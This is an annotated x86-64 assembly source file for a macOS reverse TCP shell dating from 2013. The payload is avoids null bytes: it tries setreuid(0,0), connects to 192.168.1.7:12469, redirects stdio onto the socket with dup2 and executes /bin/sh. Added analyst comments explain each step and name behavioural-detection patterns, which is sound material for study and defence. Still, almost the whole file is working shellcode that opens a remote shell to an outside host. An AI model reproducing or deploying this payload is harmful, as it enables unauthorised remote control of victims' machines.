- ;//
- ;// reverse_tcp_shell_osx.s
- ;// tested on 10.8.2 - should work on 10.7
- ;//
- ;// Created by 0xACAB on 2/16/13.
- ;//
- ;//
- BITS 64
- ; XNU (macOS) BSD-class syscall numbers. The code ORs/adds these into a
- ; register that already holds SYSCALL_CLASS_UNIX << 24, so only the low
- ; byte is defined here.
- sys_exit        equ 1
- sys_execve      equ 59
- sys_dup2        equ 90
- sys_socket      equ 97
- sys_connect     equ 98
- sys_setreuid    equ 126
- ; socket(2) arguments
- AF_INET         equ 2
- SOCK_STREAM     equ 1
- global start
- section .text
- ;-----------------------------------------------------------------------
- ; start - process entry point (no C signature; nothing here returns to a
- ; caller, and no `call` is made, so no register is callee-saved).
- ; Target: x86-64 XNU (macOS), raw `syscall`, NASM syntax.
- ; Flow:   setreuid(0,0) -> socket(AF_INET,SOCK_STREAM,0) -> connect(addr)
- ;         -> dup2(sock, 0..2) -> execve("/bin/sh", NULL, NULL) -> exit(0)
- ; Register roles carried across labels:
- ;   r9  = SYSCALL_CLASS_UNIX << 24 (0x02000000); rax is rebuilt from it
- ;         before every syscall because the kernel overwrites rax
- ;   rdi = socket fd from _connect onward (connect's and dup2's 1st arg)
- ;   rsi = 0 from the post-connect check onward, then dup2's fd counter
- ; Analyst notes: every immediate is chosen to avoid 0x00 bytes (see the
- ; `sub ax` and `shl/shr` fix-ups). The peer address lives in the
- ; sockaddr_in built on the stack in _connect. The only error path taken
- ; is connect failure -> _exit; setreuid and dup2 results are never checked.
- ;-----------------------------------------------------------------------
- start:
- _setup_nix_sys:
- ; OS X requires SYSCALL_CLASS_UNIX set in upper order bits when using syscalls
- ; Built as a byte shifted into place rather than a 32-bit immediate.
- xor r9d,r9d
- mov r9b, 0x02
- shl r9, 24 ; r9 = 0x02000000
- _setreuid:
- ; setreuid(0, 0): attempt to become root. The result is not checked, so
- ; execution continues with whatever privileges the process actually has.
- ; Reviewer note: setreuid(0,0) immediately followed by socket/connect is a
- ; commonly used behavioural-detection trigger; worth keying on.
- mov rax, r9
- add al, sys_setreuid ; low byte of r9 is 0, so `add al` == `or al` here
- xor edi, edi ; ruid = 0
- xor esi, esi ; euid = 0
- syscall
- _socket:
- ; socket(AF_INET, SOCK_STREAM, 0) -> rax = fd (or error).
- ; dil/sil write only the low byte; the upper bits of rdi/rsi are the
- ; zeros left by _setreuid - assumes the previous syscall did not touch
- ; rdi/rsi (XNU is expected to clobber only rax, rcx, r11 - confirm).
- mov rax, r9
- add al, sys_socket
- mov dil, AF_INET
- mov sil, SOCK_STREAM
- xor edx, edx ; protocol = 0
- syscall
- _connect:
- ; move sockfd into rdi (1st param for connect syscall); rdi keeps this
- ; value through the dup2 loop below
- mov rdi, rax
- ; Build a 16-byte sockaddr_in on the stack, high half first.
- xor eax, eax
- push rax ; 8 zero bytes: the sin_zero padding
- mov rax, 0x701a8c0b5300103 ;192.168.1.7:12469 + AF_INET in network order (0002 masked)
- ; After the fix-up below rax = 0x0701a8c0b5300002, which little-endian
- ; memory holds as: 02 00 | 30 b5 | c0 a8 01 07
- ;   = first word 0x0002 (the author's "AF_INET" word; on macOS the first
- ;     byte of sockaddr_in is sin_len, second sin_family - confirm how XNU
- ;     treats this), port 0x30b5 = 12469 (network order), 192.168.1.7
- sub ax, 0x0101 ; 0x0103 -> 0x0002 without a 0x00 byte in the immediate
- push rax ; sockaddr_in now occupies [rsp, rsp+16)
- mov rsi, rsp ; rsi = &sockaddr
- xor edx, edx
- mov dl, 16 ; rdx = sizeof(struct sockaddr_in)
- ; connect to 192.168.1.7:12469
- mov rax, r9
- add al, sys_connect
- syscall
- ; check if all good, otherwise, exit
- ; Only the low byte of the return value is inspected: success returns 0;
- ; on failure the low byte is expected to be nonzero (presumably errno in
- ; rax - confirm against XNU's BSD syscall return convention). The carry
- ; flag is not consulted. `xor esi,esi` also seeds rsi = 0 as the first fd
- ; for the dup2 loop.
- xor esi, esi
- cmp sil, al ; 0 - al
- jb _exit ; taken when 0 < al (unsigned), i.e. al != 0
- _connected:
- ; connect stdin(0), stdout(1), and stderr(2) - note, rsi should still be 0x0; rdi should still have sockfd
- ; dup2(sockfd, fd) for fd = 0, 1, 2, so the shell's stdio is the socket.
- ; Reviewer note: "dup2 of a socket onto 0/1/2 then execve" is the classic
- ; pattern behavioural EDR rules look for on this platform.
- mov rax, r9
- add al, sys_dup2
- syscall
- cmp sil, 2 ; CF = (fd < 2)
- inc sil ; fd++ - inc rewrites ZF/SF/OF but preserves CF
- ; jbe tests CF|ZF; ZF now comes from `inc` (0 unless sil wrapped), so in
- ; practice only the CF from the cmp decides: loop while old fd < 2.
- ; Net effect: exactly three iterations with fd = 0, 1, 2.
- jbe _connected
- _run:
- ; execve to /bin/sh
- ; execve("/bin/sh", NULL, NULL) does not return on success; on failure
- ; execution falls through into _exit.
- mov rax, r9
- add al, sys_execve
- mov rdi, 0xff68732f6e69622f ; bytes 2f 62 69 6e 2f 73 68 ff = "/bin/sh" + 0xff filler
- ; create null byte to terminate properly
- ; (shl/shr by 8 clears the top byte: "/bin/sh\0" without a 0x00 in the immediate)
- shl rdi, 8
- shr rdi, 8
- push rdi
- mov rdi, rsp ; rdi = pointer to "/bin/sh" on the stack
- xor esi, esi ; char *argv[] = null
- xor edx, edx ; char *envp[] = null
- syscall
- _exit:
- ; exit(0). rbp is never written anywhere in this listing, so the value
- ; copied into rsp here is whatever the loader left in rbp (presumably 0
- ; at process entry - confirm); nothing after this touches the stack.
- mov rsp, rbp
- mov rax, r9
- or al, sys_exit ; same low-byte trick as the `add al` forms above
- xor edi, edi ; status = 0
- syscall